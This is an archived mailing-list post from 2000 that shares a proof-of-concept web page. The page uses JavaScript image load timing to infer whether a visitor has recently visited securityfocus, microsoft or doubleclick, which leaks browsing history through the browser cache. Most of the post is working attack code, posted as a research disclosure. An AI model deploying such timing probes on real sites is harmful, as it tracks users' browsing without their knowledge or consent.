Vulnerability Development mailing list archives
cache cookie stuff
From: Henri Torgemane <henri_torgemane () YAHOO COM>
Date: Wed, 13 Dec 2000 19:13:54 -0800
Hello, I submitted this stuff on bugtraq yesterday, but it doesn't look like it made it through. In fact, I should probably have posted it here in the first place. Here's a try at implementing the privacy issue described on the princeton PR that was mentioned on bugtraq (url below). It does work, although it doesn't seem overly bad. If someone else can come with a way to achieve the same result without the user being able to know about it (in my implementation, anyone can view the source to see something weird is happening), then it would become a bit more serious. Anyway, here goes. Henri <html> <head> <script> /** quick attempt at implementing http://www.princeton.edu/pr/news/00/q4/1205-browser.htm * This page loads an image present on another site twice, then compare the loading times. * If the loading times are close enough, the image was probably already in the cache * * This implementation "destroys" a "cache cookie" each time it checks for it, as it will * place it in the cache not matter what. It is not 100% reliable, particularly if you're * using your bandwidth and/or your CPU to do something else. * */ function timeme (url) { var img = new Image; var date = new Date; img.onload = function (){ timeagain (url, new Date - date); } img.src = url; } function timeagain (url, score) { var img = new Image; var date = new Date; img.onload = function (){ result (score - (new Date - date)); } img.src = url; } function result (v) { document.f.t.value = (v<50?"":"not")+" visited. time diff= "+v; } </script> </head> <body> <form name=f> <input type=button onclick="timeme ('http://www.securityfocus.com/images/frames/logo-top2.gif')" value="securityfocus"> <input type=button onclick="timeme ('http://www.microsoft.com/library/homepage/images/ms-banner.gif')" value="ms"> <input type=button onclick="timeme ('http://www.doubleclick.com/images/splash.main.gif')" value="doubleclick"> <br> <input type=text size=40 name=t> </form> </body> </html> __________________________________________________ Do You Yahoo!? Yahoo! Shopping - Thousands of Stores. Millions of Products. http://shopping.yahoo.com/
Current thread:
- cache cookie stuff Henri Torgemane (Dec 15)